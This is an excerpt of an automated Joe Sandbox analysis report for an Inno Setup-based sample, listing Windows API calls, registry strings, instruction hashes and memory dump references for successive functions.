                                                                                            • Opcode ID: bd917288eaa5b05b1195b505efe9116c2b5c78d32a5283306b423edfa0bdd6d5
                                                                                            • Instruction ID: c614f106b7f0b4f176116dff63491c2ec041d81708a05a15fd0d1780f22877a3
                                                                                            • Opcode Fuzzy Hash: bd917288eaa5b05b1195b505efe9116c2b5c78d32a5283306b423edfa0bdd6d5
                                                                                            • Instruction Fuzzy Hash: 97A14934A00109DFCB00EF99D986EDEB7F5AF48304F5540B6E404AB362D738AE45CB9A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: /:*?"<>|
                                                                                            • API String ID: 0-4078764451
                                                                                            • Opcode ID: e5c60157bcf2278da473a52dbfa3e40327efacf8e8b2ac4b78b74c9d89147c88
                                                                                            • Instruction ID: 6c3526c54916fe71946563460b5bd12015a165326d65a32731909bc5939f884d
                                                                                            • Opcode Fuzzy Hash: e5c60157bcf2278da473a52dbfa3e40327efacf8e8b2ac4b78b74c9d89147c88
                                                                                            • Instruction Fuzzy Hash: CF71C370A40215BADB10E766DCD2FEE7BA19F05308F148067F580BB292E779AD458B4E
                                                                                            APIs
                                                                                            • SetActiveWindow.USER32(?), ref: 00482676
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ActiveWindow
                                                                                            • String ID: InitializeWizard
                                                                                            • API String ID: 2558294473-2356795471
                                                                                            • Opcode ID: 3626624f3147e861467950174f06d96ecabfee41a1c9b8d7b2440425271d24be
                                                                                            • Instruction ID: 0fabbc08dbff6a0894d12042e1c617afa12541eacf44f0b659f2bb150b55c2ae
                                                                                            • Opcode Fuzzy Hash: 3626624f3147e861467950174f06d96ecabfee41a1c9b8d7b2440425271d24be
                                                                                            • Instruction Fuzzy Hash: 8311C130204200AFD700EB69EED6B1A37E4E764328F60057BE404D72A1EA796C41CB5E
                                                                                            APIs
                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,0047C740,00000000,0047C942), ref: 0047C539
                                                                                            Strings
                                                                                            • Software\Microsoft\Windows\CurrentVersion, xrefs: 0047C509
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseOpen
                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion
                                                                                            • API String ID: 47109696-1019749484
                                                                                            • Opcode ID: 058bbab7ea9ec86a0dd33160b35f36364f977485e0abef3b7f9f2bc760079b92
                                                                                            • Instruction ID: acdf9366f140fa0c09696ff4b806567a5b27613a006b44f2785fa8682630d216
                                                                                            • Opcode Fuzzy Hash: 058bbab7ea9ec86a0dd33160b35f36364f977485e0abef3b7f9f2bc760079b92
                                                                                            • Instruction Fuzzy Hash: 6CF0823170052477DA00A65E6C82B9FA79D8B84758F60403FF508DB242EABAEE0243EC
                                                                                            APIs
                                                                                            • RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,0047620E,?,0049C1E0,?,0046F15B,?,00000000,0046F6F6,?,_is1), ref: 0046EE67
                                                                                            Strings
                                                                                            • Inno Setup: Setup Version, xrefs: 0046EE65
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Value
                                                                                            • String ID: Inno Setup: Setup Version
                                                                                            • API String ID: 3702945584-4166306022
                                                                                            • Opcode ID: 80676ca53bf8d59feef104d4bc7cb567c816a54b460bafb4a4ed583678a3f251
                                                                                            • Instruction ID: 37dbbd71146fd60ed96ba35b84ff74d599aeccd68d0f9eb37ee109455dfe34ad
                                                                                            • Opcode Fuzzy Hash: 80676ca53bf8d59feef104d4bc7cb567c816a54b460bafb4a4ed583678a3f251
                                                                                            • Instruction Fuzzy Hash: B1E06D753012043FE710AA2B9C85F5BBADCDF88365F10403AB908DB392D578DD0181A9
                                                                                            APIs
                                                                                            • RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F532,?,?,00000000,0046F6F6,?,_is1,?), ref: 0046EEC7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Value
                                                                                            • String ID: NoModify
                                                                                            • API String ID: 3702945584-1699962838
                                                                                            • Opcode ID: f40bfeae81701b53243146576d0ffb0e6a468f93b3df03c8cd4f9f1e738a44cb
                                                                                            • Instruction ID: 84621f748531697c6bb4a8e0450a59e651a2caf9945441e4ffcb8bd5fa838dfd
                                                                                            • Opcode Fuzzy Hash: f40bfeae81701b53243146576d0ffb0e6a468f93b3df03c8cd4f9f1e738a44cb
                                                                                            • Instruction Fuzzy Hash: F6E04FB4640308BFEB04DB55CD4AF6B77ECDB48714F10405ABA049B281E674FE00C669
                                                                                            APIs
                                                                                            • GetACP.KERNEL32(?,?,00000001,00000000,0047E753,?,-0000001A,00480609,-00000010,?,00000004,0000001B,00000000,00480956,?,0045DB68), ref: 0047E4EA
                                                                                              • Part of subcall function 0042E31C: GetDC.USER32(00000000), ref: 0042E32B
                                                                                              • Part of subcall function 0042E31C: EnumFontsA.GDI32(?,00000000,0042E308,00000000,00000000,0042E374,?,00000000,00000000,004809BD,?,?,00000001,00000000,00000002,00000000), ref: 0042E356
                                                                                              • Part of subcall function 0042E31C: ReleaseDC.USER32(00000000,?), ref: 0042E36E
                                                                                            • SendNotifyMessageA.USER32(0002043C,00000496,00002711,-00000001), ref: 0047E6BA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: EnumFontsMessageNotifyReleaseSend
                                                                                            • String ID:
                                                                                            • API String ID: 2649214853-0
                                                                                            • Opcode ID: 7f479caed6d506e1fedd37a3e9b8fbc918d7d672324c4412b746d2e8a14c4527
                                                                                            • Instruction ID: a62c935d52da393e7312112ce75ddb0898731394ffd2a16b1d4fc3e518f8127d
                                                                                            • Opcode Fuzzy Hash: 7f479caed6d506e1fedd37a3e9b8fbc918d7d672324c4412b746d2e8a14c4527
                                                                                            • Instruction Fuzzy Hash: 5B5195746001049BC710FF67E98169A37E5EB58308B90C67BA8049B3A6DB3CED45CB9D
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,0047DF83,?,?,?,?,00000000,00000000,00000000,00000000), ref: 0047DF3D
                                                                                              • Part of subcall function 0042CA00: GetSystemMetrics.USER32(0000002A), ref: 0042CA12
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMetricsMultiSystemWide
                                                                                            • String ID: /G
                                                                                            • API String ID: 224039744-2088674125
                                                                                            • Opcode ID: 9f8ad520ff63b3f089cafa147e7d8bbd1691bb3a433f158030b0d1014876a4d7
                                                                                            • Instruction ID: 84c81a41a939c89cd5cf89585cf0d961f9543ff151f38a86aad590f5673b43e0
                                                                                            • Opcode Fuzzy Hash: 9f8ad520ff63b3f089cafa147e7d8bbd1691bb3a433f158030b0d1014876a4d7
                                                                                            • Instruction Fuzzy Hash: 53518070A04215AFDB21DF55D8C4FAA7BB8EF64318F118077E404AB3A1C778AE45CB99
                                                                                            APIs
                                                                                            • RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DFD6,?,?,00000008,00000000,00000000,0042E003), ref: 0042DF6C
                                                                                            • RegCloseKey.ADVAPI32(?,0042DFDD,?,00000000,00000000,00000000,00000000,00000000,0042DFD6,?,?,00000008,00000000,00000000,0042E003), ref: 0042DFD0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseEnum
                                                                                            • String ID:
                                                                                            • API String ID: 2818636725-0
                                                                                            • Opcode ID: 54e2847b2ed8cbec0c232d6556bf46b22f1e93997a90c035dd6b8310f6c19c74
                                                                                            • Instruction ID: d62689c7b7995b9893119ef97773413105dd68debc8ff02f2d4f9d8a28cc91ff
                                                                                            • Opcode Fuzzy Hash: 54e2847b2ed8cbec0c232d6556bf46b22f1e93997a90c035dd6b8310f6c19c74
                                                                                            • Instruction Fuzzy Hash: DD31B270F04258AEDB11DFA6DD42BAEBBB9EB49304F91407BE501E6280D6785E01CA2D
                                                                                            APIs
                                                                                            • CreateProcessA.KERNEL32(00000000,00000000,?,?,00458278,00000000,00458260,?,?,?,00000000,00452862,?,?,?,00000001), ref: 0045283C
                                                                                            • GetLastError.KERNEL32(00000000,00000000,?,?,00458278,00000000,00458260,?,?,?,00000000,00452862,?,?,?,00000001), ref: 00452844
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateErrorLastProcess
                                                                                            • String ID:
                                                                                            • API String ID: 2919029540-0
                                                                                            • Opcode ID: 32d7980bd8ec2bee900e92c865b72ef71cfaa45d55aa0c85c0401d49ed696f28
                                                                                            • Instruction ID: fcc055d8c1a696a2a0db1e32a085008d871673fec5534948229a16d4440eefa6
                                                                                            • Opcode Fuzzy Hash: 32d7980bd8ec2bee900e92c865b72ef71cfaa45d55aa0c85c0401d49ed696f28
                                                                                            • Instruction Fuzzy Hash: A2113C72600208AF8B40DEA9DD41D9F77ECEB4E310B114567FD18D3241D678EE148B68
                                                                                            APIs
                                                                                            • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040ADF2
                                                                                            • FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040AF4F,00000000,0040AF67,?,?,?,00000000), ref: 0040AE03
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Resource$FindFree
                                                                                            • String ID:
                                                                                            • API String ID: 4097029671-0
                                                                                            • Opcode ID: 07387713778517d694c210176a4718dd0562bb365b6db4bb8115bda04798bcb6
                                                                                            • Instruction ID: 3d7a77417cef7b3885e8747e4544195f2de945da78ee84bb1155330bb8f828e3
                                                                                            • Opcode Fuzzy Hash: 07387713778517d694c210176a4718dd0562bb365b6db4bb8115bda04798bcb6
                                                                                            • Instruction Fuzzy Hash: 0301F771300700AFD700FF69EC52E1B77EDDB46714710807AF500AB3D1D639AC10966A
                                                                                            APIs
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0041EEF3
                                                                                            • EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Thread$CurrentEnumWindows
                                                                                            • String ID:
                                                                                            • API String ID: 2396873506-0
                                                                                            • Opcode ID: 30aad164e0a195eeb96462141dc827bf49acbc8680001675c00c89b7ac155170
                                                                                            • Instruction ID: bcaa23655132f8f2785c0a842f21b48ac99b37e3223c43442b01e3940dbd0cdf
                                                                                            • Opcode Fuzzy Hash: 30aad164e0a195eeb96462141dc827bf49acbc8680001675c00c89b7ac155170
                                                                                            • Instruction Fuzzy Hash: 31015B76A04604BFD706CF6BEC1199ABBE8E789720B22887BEC04D3690E7355C10DF18
                                                                                            APIs
                                                                                            • MoveFileA.KERNEL32(00000000,00000000), ref: 00452CC2
                                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,00452CE8), ref: 00452CCA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorFileLastMove
                                                                                            • String ID:
                                                                                            • API String ID: 55378915-0
                                                                                            • Opcode ID: 92f277caa9c3c56662d1ce6f28aaa0531c95695199337b3952b9b7b9e7465d28
                                                                                            • Instruction ID: 1f9035ddd188b097fe3d15476f32cd7793c58c8f4df07880d9fc6ba60e4ff235
                                                                                            • Opcode Fuzzy Hash: 92f277caa9c3c56662d1ce6f28aaa0531c95695199337b3952b9b7b9e7465d28
                                                                                            • Instruction Fuzzy Hash: 9401D671A04208AB8712EB799D4149EB7ECEB8A32575045BBFC04E3243EA785E048558
                                                                                            APIs
                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,004527CF), ref: 004527A9
                                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,004527CF), ref: 004527B1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                            • String ID:
                                                                                            • API String ID: 1375471231-0
                                                                                            • Opcode ID: 855e2e178366579e8cdbc9f044a0346376c594dce53ca60ac40061c8de66a150
                                                                                            • Instruction ID: e3b373b60118a844676bb749001e6832c3b26a50706decb61b3ae2e0e224b701
                                                                                            • Opcode Fuzzy Hash: 855e2e178366579e8cdbc9f044a0346376c594dce53ca60ac40061c8de66a150
                                                                                            • Instruction Fuzzy Hash: 40F02871A00308BBCB01EF759D4259EB7E8EB4E311B2045B7FC04E3642E6B94E04859C
                                                                                            APIs
                                                                                            • LoadCursorA.USER32(00000000,00007F00), ref: 00423249
                                                                                            • LoadCursorA.USER32(00000000,00000000), ref: 00423273
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CursorLoad
                                                                                            • String ID:
                                                                                            • API String ID: 3238433803-0
                                                                                            • Opcode ID: 0c9a104e89a33193f60416200903d3bd70bbd31149720632682593485f60625b
                                                                                            • Instruction ID: 5e34cf6406f075c2c63d733b1f02ef4b9a88184ee1572dc0f3c8875cc615d59b
                                                                                            • Opcode Fuzzy Hash: 0c9a104e89a33193f60416200903d3bd70bbd31149720632682593485f60625b
                                                                                            • Instruction Fuzzy Hash: 9EF0A711B04254AADA109E7E6CC0D6B72A8DF82735B61037BFA3EC72D1C62E1D414569
                                                                                            APIs
                                                                                            • SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLibraryLoadMode
                                                                                            • String ID:
                                                                                            • API String ID: 2987862817-0
                                                                                            • Opcode ID: 4bb5710dc3172506f3a82e57bec548632d1945d06b3d92e94bd16d63dfaa8550
                                                                                            • Instruction ID: 14c2566281f292fbf4bc3f3871eddb8f7eb4f11f4d1149329263d7d1c8790498
                                                                                            • Opcode Fuzzy Hash: 4bb5710dc3172506f3a82e57bec548632d1945d06b3d92e94bd16d63dfaa8550
                                                                                            • Instruction Fuzzy Hash: 02F08970B147447FDB119F779CA241BBBECDB49B1175249B6F800A3591E53C4910C928
                                                                                            APIs
                                                                                            • SHGetKnownFolderPath.SHELL32(00499D40,00008000,00000000,?), ref: 0047C89B
                                                                                            • CoTaskMemFree.OLE32(?,0047C8DE), ref: 0047C8D1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: FolderFreeKnownPathTask
                                                                                            • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                                                            • API String ID: 969438705-544719455
                                                                                            • Opcode ID: c380859d91d2530b1710b7ab5da91f48806622674321ef44444f1ad2bc0d7433
                                                                                            • Instruction ID: f48ec61de784b6bea0373c7a91bc006da4a0813e938d35ae17fa89473a65de5f
                                                                                            • Opcode Fuzzy Hash: c380859d91d2530b1710b7ab5da91f48806622674321ef44444f1ad2bc0d7433
                                                                                            • Instruction Fuzzy Hash: 22E09230340604BFEB15EB61DC92F6977A8EB48B01B72847BF504E2680D67CAD00DB1C
                                                                                            APIs
                                                                                            • SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,00470149,?,00000000), ref: 0045090E
                                                                                            • GetLastError.KERNEL32(?,00000000,?,00000002,?,?,00470149,?,00000000), ref: 00450916
                                                                                              • Part of subcall function 004506B4: GetLastError.KERNEL32(004504D0,00450776,?,00000000,?,00497E2C,00000001,00000000,00000002,00000000,00497F8D,?,?,00000005,00000000,00497FC1), ref: 004506B7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
